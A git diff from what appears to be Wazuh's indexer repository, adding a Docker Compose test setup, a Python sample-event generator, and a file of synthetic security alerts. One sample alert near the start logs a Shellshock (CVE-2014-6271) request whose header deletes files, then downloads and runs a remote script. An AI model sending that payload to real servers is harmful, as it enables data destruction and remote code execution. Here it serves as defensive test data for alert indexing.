"CVE-2014-6271https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271", + "gdpr": [ + "IV_35.7.d" + ] + }, + "location": "/var/log/nginx/access.log", + "decoder": { + "name": "web-accesslog" + }, + "id": "1707402914.872885", + "GeoLocation": { + "city_name": "Amsterdam", + "country_name": "Netherlands", + "region_name": "North Holland", + "location": { + "lon": 4.9087, + "lat": 52.3534 + } + }, + "full_log": "000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] \"GET /cgi-bin/jarrewrite.sh HTTP/1.1\" 404 162 \"-\" \"() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'\"", + "timestamp": "2024-02-08T11:35:14.334-0300" +} \ No newline at end of file diff --git a/integrations/docker/amazon-security-lake.yml b/integrations/docker/amazon-security-lake.yml new file mode 100644 index 0000000000000..65a8905bcd987 --- /dev/null +++ b/integrations/docker/amazon-security-lake.yml @@ -0,0 +1,115 @@ +version: "3.8" +name: "amazon-security-lake" +services: + events-generator: + image: wazuh/indexer-events-generator + build: + context: ../tools/events-generator + container_name: events-generator + depends_on: + wazuh.indexer: + condition: service_healthy + command: bash -c "python run.py -a wazuh.indexer" + + wazuh.indexer: + image: opensearchproject/opensearch:2.11.1 + container_name: wazuh.indexer + depends_on: + wazuh-certs-generator: + condition: service_completed_successfully + hostname: wazuh.indexer + ports: + - 9200:9200 + environment: + # - cluster.name=opensearch-cluster + - node.name=wazuh.indexer + - discovery.type=single-node + # - cluster.initial_cluster_manager_nodes=opensearch-node + - bootstrap.memory_lock=true + - "DISABLE_INSTALL_DEMO_CONFIG=true" + - plugins.security.ssl.http.enabled=true + - plugins.security.allow_default_init_securityindex=true + - plugins.security.ssl.http.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.transport.pemcert_filepath=/usr/share/opensearch/config/wazuh.indexer.pem + - plugins.security.ssl.http.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.transport.pemkey_filepath=/usr/share/opensearch/config/wazuh.indexer-key.pem + - plugins.security.ssl.http.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.ssl.transport.pemtrustedcas_filepath=/usr/share/opensearch/config/root-ca.pem + - plugins.security.authcz.admin_dn="CN=wazuh.indexer,OU=Wazuh,O=Wazuh,L=California, C=US" + - "OPENSEARCH_JAVA_OPTS=-Xms512m -Xmx512m" + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + healthcheck: + test: curl -sku admin:admin https://localhost:9200/_cat/health | grep -q docker-cluster + start_period: 10s + start_interval: 3s + volumes: + - data:/usr/share/opensearch/data + - ./certs/wazuh.indexer.pem:/usr/share/opensearch/config/wazuh.indexer.pem + - ./certs/wazuh.indexer-key.pem:/usr/share/opensearch/config/wazuh.indexer-key.pem + - ./certs/root-ca.pem:/usr/share/opensearch/config/root-ca.pem + + wazuh.dashboard: + image: opensearchproject/opensearch-dashboards:2.11.1 + container_name: wazuh.dashboard + depends_on: + - wazuh.indexer + hostname: wazuh.dashboard + ports: + - 5601:5601 # Map host port 5601 to container port 5601 + expose: + - "5601" # Expose port 5601 for web access to OpenSearch Dashboards + environment: + OPENSEARCH_HOSTS: '["https://wazuh.indexer:9200"]' # Define the OpenSearch nodes that OpenSearch Dashboards will query + + wazuh.integration.security.lake: + image: wazuh/indexer-security-lake-integration + build: + context: ../amazon-security-lake + container_name: wazuh.integration.security.lake + depends_on: + - wazuh.indexer + hostname: wazuh.integration.security.lake + environment: + LOG_LEVEL: trace + LOGSTASH_KEYSTORE_PASS: "SecretPassword" + MONITORING_ENABLED: false + AWS_KEY: "AKIAIOSFODNN7EXAMPLE" + AWS_SECRET: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY" + ports: + - "5000:5000/tcp" + - "5000:5000/udp" + - "5044:5044" + - "9600:9600" + volumes: + - ../amazon-security-lake/logstash/pipeline:/usr/share/logstash/pipeline + - ./certs/root-ca.pem:/usr/share/logstash/root-ca.pem + # command: tail -f /dev/null + command: /usr/share/logstash/bin/logstash -f /usr/share/logstash/pipeline/indexer-to-integrator.conf --path.settings /etc/logstash --config.reload.automatic + + s3.ninja: + image: scireum/s3-ninja:latest + container_name: s3.ninja + hostname: s3.ninja + ports: + - "9444:9000" + volumes: + - s3-data:/home/sirius/data + + wazuh-certs-generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + container_name: wazuh-certs-generator + entrypoint: sh -c "/entrypoint.sh; chown -R 1000:999 /certificates; chmod 740 /certificates; chmod 440 /certificates/*" + volumes: + - ./certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + +volumes: + data: + s3-data: diff --git a/integrations/docker/config/certs.yml b/integrations/docker/config/certs.yml new file mode 100644 index 0000000000000..c3e017be10eea --- /dev/null +++ b/integrations/docker/config/certs.yml @@ -0,0 +1,16 @@ +nodes: + # Wazuh indexer server nodes + indexer: + - name: wazuh.indexer + ip: wazuh.indexer + + # Wazuh server nodes + # Use node_type only with more than one Wazuh manager + server: + - name: wazuh.manager + ip: wazuh.manager + + # Wazuh dashboard node + dashboard: + - name: wazuh.dashboard + ip: wazuh.dashboard diff --git a/integrations/tools/events-generator/.dockerignore b/integrations/tools/events-generator/.dockerignore new file mode 100644 index 0000000000000..0f028b576338e --- /dev/null +++ b/integrations/tools/events-generator/.dockerignore @@ -0,0 +1,2 @@ +.venv +Dockerfile \ No newline at end of file diff --git a/integrations/tools/events-generator/.gitignore b/integrations/tools/events-generator/.gitignore new file mode 100644 index 0000000000000..b694934fbf9b4 --- /dev/null +++ b/integrations/tools/events-generator/.gitignore @@ -0,0 +1 @@ +.venv \ No newline at end of file diff --git a/integrations/tools/events-generator/Dockerfile b/integrations/tools/events-generator/Dockerfile new file mode 100644 index 0000000000000..da32f8c042017 --- /dev/null +++ b/integrations/tools/events-generator/Dockerfile @@ -0,0 +1,4 @@ +FROM python:3.9 +COPY . /home/events-generator/ +WORKDIR /home/events-generator +RUN pip install -r requirements.txt \ No newline at end of file diff --git a/integrations/tools/events-generator/README.md b/integrations/tools/events-generator/README.md new file mode 100644 index 0000000000000..ed8e53ea8acd9 --- /dev/null +++ b/integrations/tools/events-generator/README.md @@ -0,0 +1,54 @@ +### Events generator tool + +This python tool provides functionality to generate and index sample events for Wazuh's indices. + +#### Getting started + +Create a virtual environment to install the dependencies of the project. + +```console +python -m venv .venv +source .venv/bin/activate +pip install -r requirements.txt +``` + +Start the events' generator with `./run.py` or `python run.py`. The program takes no required +arguments, as it's configured with default values that will work in most cases during development. +To know more about its capabilities and arguments, display the help menu with `-h`. + +As for now, this tool generates events for the `wazuh-alerts-4.x-*` and `wazuh-archives-4.x-*` indices. +Since 4.8.0, these indices are aliased to `wazuh-alerts` and `wazuh-archives`. If you need to, run the +[indexer-ism-init.sh](../../../distribution/src/bin/indexer-ism-init.sh) script to create them. This is important as, by default, the tool will write to +the `wazuh-alerts` alias. You may also need to create an **index pattern** in _dashboards_ in order to perform +queries to the index from the UI. To do that, go to Dashboards Management > Index Patterns > Create index pattern > wazuh-alerts-4.x-* > timestamp as Time field + +Newer indices, like `wazuh-states-vulnerabilities`, are ECS compliant and use a dedicated events' generator. +You can find it in the [ecs](../../../ecs/) folder. + + +```console +python run.py -o indexer -c 5 -t 1 +INFO:event_generator:Inventory created +INFO:event_generator:Publisher created +INFO:event_generator:Event created +{'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'dRWno40BZRXLJU5t0u6Z', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 168, '_primary_term': 1} +INFO:event_generator:Event created +{'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'dhWno40BZRXLJU5t1u6Y', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 169, '_primary_term': 1} +INFO:event_generator:Event created +{'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'dxWno40BZRXLJU5t2u6i', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 170, '_primary_term': 1} +INFO:event_generator:Event created +{'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eBWno40BZRXLJU5t3u6v', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 171, '_primary_term': 1} +INFO:event_generator:Event created +{'_index': 'wazuh-alerts-4.x-2024.02.13-000001', '_id': 'eRWno40BZRXLJU5t4u66', '_version': 1, 'result': 'created', '_shards': {'total': 2, 'successful': 2, 'failed': 0}, '_seq_no': 172, '_primary_term': 1} +``` + +### Building the Docker image + +```console +docker build -t wazuh/indexer-events-generator:latest . +``` + +Run with: +```console +docker run -it --name=wazuh-indexer-events-generator --rm wazuh/indexer-events-generator python run.py -h +``` \ No newline at end of file diff --git a/integrations/tools/events-generator/requirements.txt b/integrations/tools/events-generator/requirements.txt new file mode 100644 index 0000000000000..37912b81ef184 --- /dev/null +++ b/integrations/tools/events-generator/requirements.txt @@ -0,0 +1 @@ +requests>=2.31.0 \ No newline at end of file diff --git a/integrations/tools/events-generator/run.py b/integrations/tools/events-generator/run.py new file mode 100644 index 0000000000000..ec4ded0010c76 --- /dev/null +++ b/integrations/tools/events-generator/run.py @@ -0,0 +1,219 @@ +#!/usr/bin/python3 + +# Events generator tool for Wazuh's indices. +# Chooses a random element from /alerts.json to index +# (indexer, filebeat). Required. Destination of the events. Default: indexer. +# -c: Number of elements to push. Use 0 to run indefinitely. Default: 0 +# -i: index name prefix or module (e.g: wazuh-alerts, wazuh-states-vulnerabilities) +# -t: interval between events in seconds. Default: 5 +# when output is "indexer", the following parameters can be provided: +# -a: indexer's API IP address or hostname. +# -P: indexer's API port number. +# -u: username +# -p: password + + +from abc import ABC, abstractmethod +import argparse +import datetime +import logging +import random +import requests +import time +import json +import urllib3 +# import OpenSearch.opensearchpy + +logging.basicConfig(level=logging.NOTSET) +# Combination to supress certificates validation warning when verify=False +# https://github.com/influxdata/influxdb-python/issues/240#issuecomment-341313420 +logging.getLogger("urllib3").setLevel(logging.ERROR) +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +logger = logging.getLogger("event_generator") + +# ================================================== # + + +class Inventory: + def __init__(self, path: str): + with open(path, "r") as fd: + self.elements = fd.readlines() + self.size = len(self.elements) + + def get_random(self) -> str: + """ + Returns the last element of the list + """ + random.shuffle(self.elements) + return self.elements[self.size-1] + +# ================================================== # + + +class Publisher(ABC): + @abstractmethod + def publish(self, event: str): + pass + +# ================================================== # + + +class PublisherClient(Publisher): + def __init__(self): + # self.client = OpenSearch( + # hosts... + # ) + pass + +# ================================================== # + + +class PublisherHttp(Publisher): + def __init__(self, address: str, port: int, path: str, user: str, password: str): + super() + self.address = address + self.port = port + self.path = path + self.username = user + self.password = password + + def url(self) -> str: + return f"https://{self.address}:{self.port}/{self.path}/_doc" + + def publish(self, event: str): + try: + result = requests.post( + self.url(), + auth=(self.username, self.password), + json=json.loads(event), + verify=False + ) + print(result.json()) + except json.JSONDecodeError as e: + logger.error("Error encoding event " + + event + "\n Caused by: " + e.msg) + +# ================================================== # + + +class PublisherFilebeat(Publisher): + def __init__(self): + super() + self.path = "/var/ossec/logs/alerts/alerts.json" + + def publish(self, event: str): + with open(self.path, "a") as fd: + fd.write(event) + +# ================================================== # + + +class PublisherCreator: + @staticmethod + def create(publisher: str, args) -> Publisher: + if publisher == "indexer": + address = args["address"] + port = args["port"] + path = args["index"] + username = args["username"] + password = args["password"] + + return PublisherHttp(address, port, path, username, password) + elif publisher == "filebeat": + return PublisherFilebeat() + else: + raise ValueError("Unsupported publisher type") + +# ================================================== # + + +def date_now() -> str: + return datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]+'+0000' + +# ================================================== # + + +def parse_args(): + parser = argparse.ArgumentParser( + description="Events generator tool for Wazuh's indices. Indexes a random element from /alerts.json", + ) + parser.add_argument( + '-i', '--index', + default="wazuh-alerts-4.x-sample", + help="Destination index name or alias" + ) + parser.add_argument( + '-o', '--output', + choices=['indexer', 'filebeat'], + default="indexer", + help="Destination of the events. Default: indexer." + ) + parser.add_argument( + '-m', '--module', + default="wazuh-alerts", + help="Wazuh module to read the alerts from (e.g: wazuh-alerts, wazuh-states-vulnerabilities). Must match a subfolder's name." + ) + # Infinite loop by default + parser.add_argument( + '-c', '--count', + default=0, + type=int, + help="Number of elements to push. Use 0 to run indefinitely. Default: 0" + ) + # Interval of time between events + parser.add_argument( + '-t', '--time', + default=5, + type=int, + help="Interval between events in seconds. Default: 5" + ) + parser.add_argument( + '-a', '--address', + default="localhost", + help="Indexer's API IP address or hostname." + ) + parser.add_argument( + '-P', '--port', + default=9200, + type=int, + help="Indexer's API port number." + ) + parser.add_argument( + '-u', '--username', + default="admin", + help="Indexer's username" + ) + parser.add_argument( + '-p', '--password', + default="admin", + help="Indexer's password" + ) + return parser.parse_args() + + +# ================================================== # + + +def main(args: dict): + inventory = Inventory(f"{args['module']}/alerts.json") + logger.info("Inventory created") + publisher = PublisherCreator.create(args["output"], args) + logger.info("Publisher created") + + count = 0 + max_iter = args["count"] + time_interval = args["time"] + while (count < max_iter or max_iter == 0): + chosen = inventory.get_random().replace("{timestamp}", date_now()) + logger.info("Event created") + publisher.publish(chosen) + + time.sleep(time_interval) + count += 1 + +# ================================================== # + + +if __name__ == '__main__': + main(vars(parse_args())) diff --git a/integrations/tools/events-generator/wazuh-alerts/alerts.json b/integrations/tools/events-generator/wazuh-alerts/alerts.json new file mode 100644 index 0000000000000..7c1656c49fc33 --- /dev/null +++ b/integrations/tools/events-generator/wazuh-alerts/alerts.json @@ -0,0 +1,1000 @@ +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":5,"pci_dss":["11.5"],"hipaa":["164.312.c.1","164.312.c.2"],"description":"File added to the system.","groups":["wazuh","syscheck"],"id":"554","nist_800_53":["SI.7"],"gpg13":["4.11"],"gdpr":["II_5.1.f"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{},"location":"","syscheck":{"event":"added","path":"/var/log/lastlog","uname_after":"root","gname_after":"root","mtime_after":"2023-03-07T17:52:50.390Z","size_after":38,"uid_after":"S-1-5-18","gid_after":"22","perm_after":"rw-r--r--","inode_after":23315}} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"pci_dss":["11.5"],"hipaa":["164.312.c.1","164.312.c.2"],"description":"Integrity checksum changed.","groups":["wazuh","syscheck"],"id":"550","nist_800_53":["SI.7"],"gpg13":["4.11"],"gdpr":["II_5.1.f"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{},"location":"","syscheck":{"event":"modified","path":"/etc/sysconfig/network-scripts/ifcfg-eth1","uname_after":"suricata","gname_after":"root","mtime_after":"2023-03-06T00:27:33.061Z","size_after":18,"uid_after":"S-1-5-32-544","gid_after":"994","perm_after":"rw-r--r--","inode_after":25973,"mtime_before":"2023-03-06T00:26:33.061Z","inode_before":81839,"sha1_after":"42b103c8ccf0f552e931159fdccf2072f1444842","changed_attributes":["sha1"],"md5_after":"896a6493ad8dd456f9a9d919d9c74a5e","sha256_after":"6cadaacded787afb101f14c9b404daed8c8800f19199a31024ce91ea1f26"}} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":5,"pci_dss":["11.5"],"hipaa":["164.312.c.1","164.312.c.2"],"description":"File added to the system.","groups":["wazuh","syscheck"],"id":"554","nist_800_53":["SI.7"],"gpg13":["4.11"],"gdpr":["II_5.1.f"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{},"location":"","syscheck":{"event":"added","path":"/var/wazuh/queue/fim/db/fim.db","uname_after":"Administrators","gname_after":"root","mtime_after":"2023-03-03T06:38:30.327Z","size_after":46,"uid_after":"S-1-5-18","gid_after":"994","perm_after":"rw-r--r--","inode_after":27089}} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":5,"pci_dss":["11.5"],"hipaa":["164.312.c.1","164.312.c.2"],"description":"File added to the system.","groups":["wazuh","syscheck"],"id":"554","nist_800_53":["SI.7"],"gpg13":["4.11"],"gdpr":["II_5.1.f"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{},"data":{},"location":"","syscheck":{"event":"added","path":"/etc/elasticsearch/elasticsearch.yml","uname_after":"ec2-user","gname_after":"root","mtime_after":"2023-03-06T15:35:43.101Z","size_after":47,"uid_after":"S-1-5-32-544","gid_after":"993","perm_after":"rw-r--r--","inode_after":94411}} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Rh-Sharpe' detected by the presence of file '/usr/bin/.ps'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Rh-Sharpe' detected by the presence of file '/usr/bin/.ps'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/ps","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/ps' detected. Signature used: '/dev/ttyo|.1proc|proc.h|bash|^/bin/sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Bash' detected by the presence of file '/tmp/mcliZokhb'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":2,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/fuser","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/fuser' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[a-dtz]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/find","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/find' detected. Signature used: 'bash|/dev/[^tnlcs]|/prof|/home/virus|file.h' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":8,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Knark' detected by the presence of file '/dev/.pizda'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Knark' detected by the presence of file '/dev/.pizda'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/top","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/top' detected. Signature used: '/dev/[^npi3st%]|proc.h|/prof/' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/egrep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/egrep' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Suspicious' detected by the presence of file 'tmp/.cheese'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Suspicious' detected by the presence of file 'tmp/.cheese'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'RSHA' detected by the presence of file 'usr/bin/chsh2'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Showtee' detected by the presence of file '/usr/lib/.kinetic'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Showtee' detected by the presence of file '/usr/lib/.kinetic'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":10,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Monkit' detected by the presence of file '/usr/lib/libpikapp.a'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":5,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/pidof","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/pidof' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/[^f]|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":6,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Slapper' detected by the presence of file '/tmp/.b'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Slapper' detected by the presence of file '/tmp/.b'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/top","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/top' detected. Signature used: '/dev/[^npi3st%]|proc.h|/prof/' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":4,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/egrep","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/egrep' detected. Signature used: 'bash|^/bin/sh|file.h|proc.h|/dev/|^/bin/.*sh' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":1,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"title":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."},"location":"rootcheck","input":{"type":"log"},"full_log":"Rootkit 'Volc' detected by the presence of file '/usr/bin/volc'."} +{"timestamp":"{timestamp}","rule":{"firedtimes":3,"mail":false,"level":7,"description":"Host-based anomaly detection event (rootcheck).","groups":["wazuh","rootcheck"],"id":"510","gdpr":["IV_35.7.d"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"rootcheck"},"data":{"file":"/usr/bin/w","title":"Trojaned version of file detected."},"location":"rootcheck","input":{"type":"log"},"full_log":"Trojaned version of file '/usr/bin/w' detected. Signature used: 'uname -a|proc.h|bash' (Generic)."} +{"timestamp":"{timestamp}","rule":{"firedtimes":7,"mail":false,"level":7,"description":"Host-based anomaly detection event 